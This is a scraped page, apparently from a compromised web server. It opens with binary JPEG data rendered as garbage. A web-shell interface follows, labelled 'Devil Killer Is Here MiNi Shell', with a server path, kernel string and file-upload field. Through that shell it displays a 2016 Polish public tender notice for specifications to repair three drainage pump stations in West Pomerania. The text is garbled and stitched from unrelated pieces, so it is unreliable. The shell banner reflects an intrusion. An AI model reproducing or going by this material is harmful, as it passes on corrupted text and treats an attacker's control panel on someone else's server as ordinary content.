JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160421/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160421/99648-N-2016.html

<p class="kh_header"><b>Szczecin: Opracowanie Opisu Przedmiotu Zamówienia (OPZ) Naprawy pompowni melioracyjnych na terenie Województwa Zachodniopomorskiego:
1.Zadanie nr 1 pompownia melioracyjna Niechorze-Skalno T/O Gryfice.
2.Zadanie nr 2 pompownia melioracyjna Stepnica I T/O Goleniów.
3.Zadanie nr 3 pompownia melioracyjna Żarnowo T/O Goleniów.</b><br>
<b>Numer ogłoszenia: 99648 - 2016; data zamieszczenia: 21.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zachodniopomorski Zarząd Melioracji i Urządzeń Wodnych w Szczecinie , ul. Wyzwolenia 105, 71-421 Szczecin, woj. zachodniopomorskie, tel. 91 440 51 00, faks 91 440 51 01.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zzmiuw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie Opisu Przedmiotu Zamówienia (OPZ) Naprawy pompowni melioracyjnych na terenie Województwa Zachodniopomorskiego:
1.Zadanie nr 1 pompownia melioracyjna Niechorze-Skalno T/O Gryfice.
2.Zadanie nr 2 pompownia melioracyjna Stepnica I T/O Goleniów.
3.Zadanie nr 3 pompownia melioracyjna Żarnowo T/O Goleniów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.2. Miejsce realizacji:
1. Stacja pomp Niechorze-Skalno, miejscowość Niechorze, gmina Rewal. Dojazd do miejscowości Niechorze drogą gruntową o długości ok. 1,4 km.
2. Stacja pomp Stepnica I, miejscowość Stepnica gmina Stepnica. Dojazd do miejscowości Stepnica ul. Łąkową w kierunku rzeki Gowienicy.
3. Stacja pomp Żarnowo, obręb Czarnocin, gmina Stepnica. Dojazd do miejscowości Żarnowo i droga płytowa ok 2 km.
1.3. Zakres przedmiotu zamówienia.
Przedmiotem zamówienia jest Opracowanie Opisu Przedmiotu Zamówienia (OPZ) - Naprawy pompowni melioracyjnych na terenie Województwa Zachodniopomorskiego:
1.	Zadanie nr 1 pompownia melioracyjna Niechorze-Skalno T/O Gryfice.
2.	Zadanie nr 2 pompownia melioracyjna Stepnica I T/O Goleniów.
3.	Zadanie nr 3 pompownia melioracyjna Żarnowo T/O Goleniów.
OPZ należy wykonać w formie papierowej - 4 egzemplarzy, przedmiar oraz kosztorys inwestor-ski - 1 egzemplarz oraz w formie elektronicznej (część opisowa - pliki doc., docx., kosztorysy i przedmiary - pliki ath. i PDF., rysunki - pliki PDF., dwg.) na płycie CD/DVD lub pendrive 2 sztuki. (dla wszystkich użytych programów w których zostały zapisane pliki wymagane jest po-siadanie licencji na użytkowanie).
1.4. Uszczegółowienie zakresu i terminów realizacji.
OPZ będzie służył jako załącznik do kolejnego SIWZ na wykonanie przedmiotowych prac i ma być materiałem pomocniczym:
-  dla Zamawiającego celem ustalenia wartości Zamówienia
- dla potencjalnych Wykonawców celem ustalenia planowanych koszów prac projektowych i robót naprawczych w trakcie przygotowania oferty
- dla Zamawiającego i Wykonawcy celem jednoznacznego ustalenia zakresu robót, wymagań technicznych i jakościowych 
Opracowanie powinno zawierać:
a)Inwentaryzacje stanu istniejącego - część opisowa i rysunkowa oraz atest-raport nurkowy.
b)Opis rozwiązań związanych z naprawą części budowlanej i hydraulicznej przepompowni 
i przystosowaniem do montażu agregatów pompowych i zatapialnych.
c)Opis rozwiązań związanych z doborem lub naprawą agregatów pompowych.
d)Opis rozwiązań związanych z naprawą układu zasilania i sterowania pracą agregatów.
e)Część rysunkowa. 
f)Przedmiar robót.
g)Kosztorys inwestorski.
W tym:
1)Część opisową obejmującą:
a)opis zaproponowanych rozwiązań,
b)opis techniczny wymogów dotyczących funkcjonowania zaproponowanych rozwiązań 
z uwzględnieniem wskazanych w opisie przepisów.
c)zaproponowane rozwiązania powinny uwzględniać wymogi określone w operatach wodno prawnych na szczególne korzystanie z wód dla pompowni melioracyjnych
2)Część rysunkową w postaci:
a)rysunków koncepcyjnych z uwzględnieniem proponowanych do wykorzystania mate-riałów
 i rozwiązań.
Etapowanie prac:
- Etap I: sporządzenie w formie graficznej i opisowej inwentaryzacji obiektów, sporządzenie ra-portu nurkowego wraz z pomiarami konstrukcji wlotowych i wylotowych obiektów. Za-proponowanie zakresu i technologii robót naprawczych. do 30 dni od daty podpisania umowy.
- Etap II: po zatwierdzeniu zaproponowanego zakresu robót naprawczych w Etapie I przez Za-mawiającego, Wykonawca wykona OPZ wraz z wymaganymi opracowaniami. do 60 dni.
Szczegółowy zakres jaki winien zawierać OPZ dla poszczególnych zadań  przedstawiono w zał. 6.1 6.3 do SIWZ. 
Operaty wodnoprawne na szczególne korzystanie z wód dla pompowni melioracyjnych objętych przedmiotem zamówienia  stanowią załączniki nr 7.1 - 7.3 do niniejszego SIWZ.
Zakres opracowania oraz dodatkowe obowiązki Wykonawcy określa wzór umowy stanowiący załącznik nr  3 do niniejszego SIWZ..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.32.20.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie zrealizował lub jest w trakcie realizacji co najmniej trzech prac projektowych polegających na wykonaniu: Opisu Przedmiotu Zamówienia (OPZ), Programu Funkcjonalno-Użytkowego (PFU), Projektów Budowlanych lub Projektów Wykonawczych budowy lub modernizacji lub remontu pompowni cieczowych:
- dotyczy zadania 1, 2, 3 - o łącznej wydajności agregatów pompowych min. 500 l/s, o wartości łącznej nie mniejszej niż 40.000,00 zł brutto (słownie: czterdzieści tysięcy złotych).

UWAGA!
1. W sytuacji, gdy Wykonawca polega na wiedzy i doświadczeniu innego podmiotu zobowiązany jest udo-wodnić Zamawiającemu, iż będzie dysponował zasobami niezbędnymi w trakcie realizacji zamówienia. W tym celu Wykonawca musi  przedstawić Zamawiającemu pisemne zobowiązanie tych podmiotów do oddania do jego dyspozycji niezbędnych zasobów  na potrzeby wykonania  zamówienia -- zgodnie z załącznikiem 2d.
2. W przypadku gdy podmioty o których mowa w ust 1 uczestniczą w wykonywaniu zamówienia, Wyko-nawca podaje nazwy (firmy) tych podwykonawców na których zasoby się powołuje. W tym celu Wykonaw-ca musi złożyć Załącznik nr 2g do SIWZ
3. W przypadku zmiany lub rezygnacji z podwykonawcy na którego zasoby Wykonawca się powołuje Wy-konawca jest zobowiązany wykazać Zamawiającemu iż proponowany inny podwykonawca  lub Wykonawca samodzielnie  spełnia warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w postę-powaniu. 
4. W stosunku do  podwykonawców na których zasoby powołuje się Wykonawca, mają zastosowanie przepisy części XVII dotyczące podwykonawców. 
Jeżeli Wykonawca, wykazując spełnianie warunków polega na wiedzy i doświadczeniu, potencjale technicz-nym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów  zamawiający, w celu oceny, czy Wykonawca będzie dysponował zasobami tych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda:
1)dokumentów dotyczących w szczególności:
a)zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonaniu zamówienia,
c)charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia (podwykonawcy)
e) podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b, odpowiada solidarnie w wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych zasobów, chyba że za nie-udostępnienie zasobów nie ponosi winy. 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia na podstawie informacji zawartych w oświadczeniach i dokumentach złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca powinien udokumentować, że dysponuje przynajmniej dwoma osobami posiadającymi kwalifikacje niezbędne do realizacji zamówienia w rozumieniu ustawy z dnia 7 lipca 1994r. Prawo budowlane (Dz. U. z 2016r., poz. 290 z późn. zm.) oraz Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11.09.2014r. w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r., poz. 1278) tj. uprawnienia do  projektowania w specjalności konstrukcyjno-budowlanej w specjalizacji budowle hydrotechniczne lub specjalności konstrukcyjno-budowlanej w specjalizacji obiekty budowlane melioracji wodnych lub innymi uprawnieniami odpowiadającymi powyższym, wydanymi na podstawie wcześniej obowiązujących przepisów. 

UWAGA!
1. W sytuacji, gdy Wykonawca polega na osobach zdolnych do wykonania zamówienia innego podmiotu zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami nie-zbędnymi w trakcie realizacji zamówienia. W tym celu Wykonawca musi  przedstawić Zamawia-jącemu pisemne zobowiązanie tych podmiotów do oddania do jego dyspozycji niezbędnych za-sobów  na potrzeby wykonania  zamówienia  zgodnie z załącznikiem 2d.
2. W przypadku gdy podmioty o których mowa w ust 1 uczestniczą w wykonywaniu zamówie-nia, Wykonawca podaje nazwy (firmy) tych podwykonawców na których zasoby się powołuje. W tym celu Wykonawca musi złożyć Załącznik nr 2g do SIWZ
3. W przypadku zmiany lub rezygnacji z podwykonawcy na którego zasoby Wykonawca się po-wołuje Wykonawca jest zobowiązany wykazać Zamawiającemu iż proponowany inny podwyko-nawca  lub Wykonawca samodzielnie  spełnia warunek udziału w postępowaniu w stopniu nie mniejszym niż wymagany w postępowaniu. 
4. W stosunku do  podwykonawców na których zasoby powołuje się Wykonawca, mają zastosowanie przepisy części XVII dotyczące podwykonawców. 
Jeżeli Wykonawca, wykazując spełnianie warunków polega na wiedzy i doświadczeniu, potencja-le technicznym, osobach zdolnych do wykonania zamówienia, zdolnościach finansowych lub ekonomicznych innych podmiotów  zamawiający, w celu oceny, czy Wykonawca będzie dyspo-nował zasobami tych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, żąda:
1)dokumentów dotyczących w szczególności:
a)zakresu dostępnych wykonawcy zasobów innego podmiotu,
b)sposobu wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonaniu zamówienia,
c)charakteru stosunku, jaki będzie łączył wykonawcę z innym podmiotem,
d)zakresu i okresu udziału innego podmiotu przy wykonywaniu zamówienia (podwyko-nawcy)
e) podmiot, który zobowiązał się do udostępnienia zasobów zgodnie z ust. 2b, odpowiada solidarnie w wykonawcą za szkodę zamawiającego powstałą wskutek nieudostępnienia tych za-sobów, chyba że za nieudostępnienie zasobów nie ponosi winy. 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia- nie spełnia na podstawie informacji zawartych w oświadczeniach i dokumentach złożonych przez Wykonawcę na potwierdzenie spełniania warunków udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje, nie wyznacza szczegółowego warunku w tym zakresie;</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony formularz oferty wg załącznika nr 1 do SIWZ
2.	Wykaz części zamówienia powierzonych podwykonawcom - załącznik nr 4 do SIWZ.
3.	Załącznik nr 2d do SIWZ - wypełniają tylko pod wypełniają tylko podmioty, które polegać będą na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączącego go z nimi stosunków.  
4.	Załącznik nr 2g do SIWZ - wypełniają pomioty, które posiadają podwykonawców 
przy realizacji zamówienia.
5.	Wykonawca wraz z ofertą, składa listę podmiotów należących do tej samej grupy kapitałowej, 
o której mowa w art. 24 ust. 2 pkt 5 Pzp - zgodnie z załącznikiem nr 2f do SIWZ 
albo informację o tym, że nie należy do grupy kapitałowej. Informację, iż wykonawca nie na-leży do tej samej grupy kapitałowej należy złożyć zgodnie z załącznikiem nr 2e do SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 70</li>
<li>2 - termin realizacji - 30</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zakazuje się istotnych zmian postanowień zawartej umowy w stosunku do treści oferty, na podstawie, której dokonano wyboru Wykonawcy, z zastrzeżeniem ust. 2 i 3.
2. Zamawiający dopuszcza możliwość istotnych zmian postanowień umowy zawartej z Wykonawcą
w stosunku do treści oferty w formie aneksu do umowy w zakresie:
1/ zmiany terminu realizacji zamówienia, przed jego upływem z przyczyn niezależnych od Wykonawcy wskazanych przez Wykonawcę. Wniosek Wykonawcy w tej sprawie wymaga uzasadnienia i udokumentowania oraz akceptacji  Zamawiającego,
 2/ przedłużenia terminu realizacji zamówienia na skutek zaistnienia okoliczności uniemożliwiających prowadzenie prac zgodnie z wymaganiami Zamawiającego, Wniosek Wykonawcy w tej sprawie wymaga uzasadnienia i udokumentowania oraz akceptacji Zamawiającego,
3/ okoliczności, których nie można było przewidzieć w chwili zawarcia umowy, a zmiany te są warunkiem wykonania umowy lub są korzystne dla Zamawiającego. Wniosek Wykonawcy w tej sprawie wymaga uzasadnienia i udokumentowania oraz akceptacji Zamawiającego,
4/ zmiana  podwykonawcy  wskazanego w ofercie udostępniającego zasoby lub rezygnacja z tego podwykonawcy, pod warunkiem że Wykonawca wykaże Zamawiającemu że proponowany inny podwykonawca lub wykonawca samodzielnie spełnia warunki udziału w postępowaniu w stopniu nie mniejszym niż wymagany w trakcie postępowania ,  
5/ powierzenia  podwykonawcy realizacji części zamówienia w sytuacji gdy  Wykonawca w ofercie zobowiązał się samodzielnie realizować zamówienie,
6/ zmiany zakresu rzeczowego robót przewidzianych do realizacji przez Wykonawcę, o którym mowa w § 5 niniejszej umowy;
3. Zamawiający dopuszcza również możliwość istotnych zmian postanowień umowy zawartej
z Wykonawcą w stosunku do treści oferty w formie aneksu do umowy w zakresie osób sprawujących bezpośredni nadzór nad realizacją przedmiotu zamówienia (Przedstawiciela Wykonawcy). Wniosek Wykonawcy w sprawie zmiany Przedstawiciela Wykonawcy wymaga uzasadnienia i udokumentowania oraz akceptacji Zamawiającego.
4. Warunkiem zmian, o których mowa w ust. 2 i 3 będzie zaistnienie szczególnych okoliczności, których nie można było przewidzieć w chwili zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zzmiuw.pl<br>
